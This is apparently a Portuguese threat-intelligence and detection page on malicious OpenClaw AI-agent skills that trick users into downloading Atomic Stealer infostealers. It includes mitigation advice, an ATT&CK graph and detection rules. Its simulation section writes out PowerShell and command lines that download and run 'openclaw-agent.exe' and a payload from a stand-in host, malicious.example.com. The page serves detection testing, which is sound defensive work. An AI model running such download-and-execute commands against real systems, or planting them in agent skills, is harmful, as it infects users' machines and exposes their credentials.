De Automação à Infecção: Como as Habilidades do Agente AI do OpenClaw Estão Sendo Armadas
Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O artigo explica como habilidades maliciosas do OpenClaw estão sendo usadas como um mecanismo de entrega de malware para usuários da plataforma de agente de IA auto-hospedada. Atores mal-intencionados publicam habilidades que parecem inofensivas, mas que, em última análise, orientam as vítimas a baixar e executar binários controlados por atacantes de fontes externas. As cargas observadas incluem executáveis do Windows e arquivos Mach-O do macOS identificados como variantes da família de infostealers Atomic Stealer. Esta atividade introduz um risco prático de cadeia de suprimentos para estações de trabalho pessoais e de desenvolvedores que dependem de habilidades fornecidas pela comunidade.
Investigação
O VirusTotal Code Insight revisou mais de três mil habilidades do OpenClaw e encontrou centenas que exibiam comportamentos maliciosos ou de alto risco. Em um exemplo, uma habilidade carregada por hightower6eu fornecia instruções passo a passo para baixar um arquivo ZIP protegido por senha do GitHub (senha: openclaw) e executar openclaw-agent.exe no Windows. No macOS, a mesma habilidade direcionava os usuários a recuperar um script codificado em Base64 do glot.io, que então baixava um executável Mach-O para execução. Os binários resultantes foram detectados por vários motores de segurança como infostealers trojanizados.
Mitigação
Trate os repositórios de habilidades como código não confiável e execute o OpenClaw em um ambiente isolado ou altamente restrito. Evite colar comandos de descrições de habilidades e não execute binários obtidos de links externos não verificados. Para operadores de mercado e comunidade, implemente a varredura no momento da publicação, focada no comportamento de download remoto, lógica de script ofuscada e indicadores de roubo de credenciais ou exfiltração de dados. Em ambientes empresariais, eduque os usuários sobre os riscos de instalar habilidades criadas pela comunidade e exija revisão antes do uso.
Resposta
Procure pacotes de habilidades do OpenClaw que referenciam URLs de download externos, arquivos protegidos por senha ou stagers de comando codificados. Alerta quando da execução de binários desconhecidos chamados openclaw-agent.exe e de lançamentos suspeitos de Mach-O que seguem atividade de download scriptada. Bloqueie a conectividade com domínios maliciosos conhecidos e isole sistemas impactados para triagem forense a fim de confirmar se ocorreu execução de infostealer e exposição de credenciais.
“graph TB %% Class definitions section classDef technique fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ffcc99 %% Technique nodes tech_software_extensions[“<b>Technique</b> – T1176 Software Extensions<br/><b>Description</b>: Adversary publishes malicious extensions or packages to a marketplace to disguise malware as legitimate functionality.”] class tech_software_extensions technique tech_user_execution[“<b>Technique</b> – T1204.002 User Execution: Malicious File<br/><b>Description</b>: Victim is tricked into executing a malicious file that downloads and runs additional payloads.”] class tech_user_execution technique tech_embedded_payloads[“<b>Technique</b> – T1027.009 Embedded Payloads<br/><b>Description</b>: Malicious code is hidden within other files or scripts to evade detection.”] class tech_embedded_payloads technique tech_polymorphic_code[“<b>Technique</b> – T1027.014 Polymorphic Code<br/><b>Description</b>: Code mutates its appearance while retaining functionality to bypass defenses.”] class tech_polymorphic_code technique tech_decode[“<b>Technique</b> – T1140 Deobfuscate/Decode Files or Information<br/><b>Description</b>: Victim decodes or decrypts obfuscated payloads before execution.”] class tech_decode technique tech_content_injection[“<b>Technique</b> – T1659 Content Injection<br/><b>Description</b>: Adversary injects malicious content such as download links or scripts into a legitimate workflow.”] class tech_content_injection technique %% Malware / payload nodes malware_infostealer[“<b>Malware</b> – Infostealer Trojan<br/><b>Description</b>: Collects credentials, browsing history and other sensitive data from the victim system.”] class malware_infostealer malware %% Process nodes proc_download_execute[“<b>Process</b> – Download and Execute External Binary<br/><b>Description</b>: Commands retrieved from the skill download additional binaries and launch them.”] class proc_download_execute process proc_decode_execute[“<b>Process</b> – Decode and Execute Payload<br/><b>Description</b>: Base64u2011encoded script is decoded and the resulting trojan is executed.”] class proc_decode_execute process %% Connections showing attack flow tech_software_extensions u002du002d>|leads_to| tech_user_execution tech_user_execution u002du002d>|triggers| proc_download_execute proc_download_execute u002du002d>|contains| tech_embedded_payloads proc_download_execute u002du002d>|contains| tech_polymorphic_code proc_download_execute u002du002d>|enables| tech_decode tech_decode u002du002d>|facilitates| proc_decode_execute proc_decode_execute u002du002d>|executes| malware_infostealer malware_infostealer u002du002d>|enables| tech_content_injection “
Fluxo de Ataque
Detecções
Possível Manipulação de Strings Codificadas em Base64 [MacOS] (via linha de comando)
Ver
Tentativa de Execução Suspeita do Curl [MacOS] (via linha de comando)
Ver
Atributos da Pasta Temporária Xattr do MacOS Foram Limpos (via criação de processo)
Ver
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Tecnologias de Terceiros (via proxy)
Ver
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Tecnologias de Terceiros (via dns)
Ver
IOCs (HashSha256) para detectar: De Automação a Infecção: Como as Habilidades de Agente de IA do OpenClaw Estão Sendo Armazenadas
Ver
Execução de Cargas Maliciosas via Habilidades do OpenClaw [Criação de Processos Linux]
Ver
Detecção de Execução Maliciosa do Agente OpenClaw [Criação de Processos do Windows]
Ver
Execução de Simulação
Pré-requisito: O Verificação Pré‑voo de Telemetria e Linha de Base deve ter sido aprovado.
Motivo: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativa DEVEM refletir diretamente os TTPs identificados e objetivar gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa de Ataque e Comandos:
Um atacante obteve acesso inicial a uma estação de trabalho da vítima e solta o binário maliciosoopenclaw-agent.exeno diretório temporário do usuário. O binário é executado com uma linha de comando que contém explicitamente as palavras-chavebaixarandexecutarpara obter cargas adicionais de um servidor C2 não confiável e executá-las na memória. O atacante usa um prompt de comando padrão do Windows para evitar detecções específicas do PowerShell, correspondendo assim às expectativas da regra Sigma.- Soltar a carga útil:
$malPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath - Execute com argumentos suspeitos:
"%TEMP%openclaw-agent.exe" baixar http://malicious.example.com/payload.bin executar - O agente contata o servidor C2, baixa
payload.bin, escreve no disco e a lança, enquanto a linha de comando do processo original ainda contém as palavras de gatilho.
- Soltar a carga útil:
-
Script de Teste de Regressão:
# ----------------------------------------------------------------------- # Simulação de Execução do Agente OpenClaw – aciona a detecção Sigma # ----------------------------------------------------------------------- # 1. Baixe o agente malicioso (simulado com um arquivo inofensivo) $agentUrl = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi" # arquivo inofensivo de marcador de posição $agentPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath # 2. Execute o agente com as palavras-chave esperadas na linha de comando $cmd = "`"$agentPath`" baixar http://malicious.example.com/payload.bin executar" Write-Host "Executando: $cmd" Start-Process -FilePath $agentPath -ArgumentList "baixar http://malicious.example.com/payload.bin executar" -NoNewWindow -Wait # 3. Opcional: Simule o download da carga útil (stub inofensivo) $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md" $payloadPath = "$env:TEMPpayload.bin" Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath Write-Host "Simulação completa. Verifique o SIEM para detecção." -
Comandos de Limpeza:
# Remova todos os artefatos criados durante a simulação $paths = @( "$env:TEMPopenclaw-agent.exe", "$env:TEMPpayload.bin" ) foreach ($p in $paths) { if (Test-Path $p) { Remove-Item -Path $p -Force Write-Host "Deleted $p" } }